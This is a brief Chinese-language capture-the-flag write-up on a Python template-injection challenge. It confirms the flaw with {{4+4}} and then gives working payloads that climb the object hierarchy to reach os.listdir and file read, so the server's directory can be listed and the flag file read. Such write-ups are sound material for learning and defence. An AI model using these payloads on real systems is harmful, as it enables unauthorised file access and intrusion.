首先进入网站,什么都没显示
    但是根据题目提示,漏洞是python模板注入
    测试一下:

    1. http://220.249.52.133:55852/{{4+4}}
    3. URL http://220.249.52.133:55852/8 not found

    可以看到4+4被成功执行,所以存在漏洞
    payload:

    1. http://220.249.52.133:55852/{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
    1. URL http://220.249.52.133:55852/['fl4g', 'index.py'] not found

    获取当前目录下的文件,然后使用内置函数read读取

    1. http://220.249.52.133:55852/{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}

    得到flag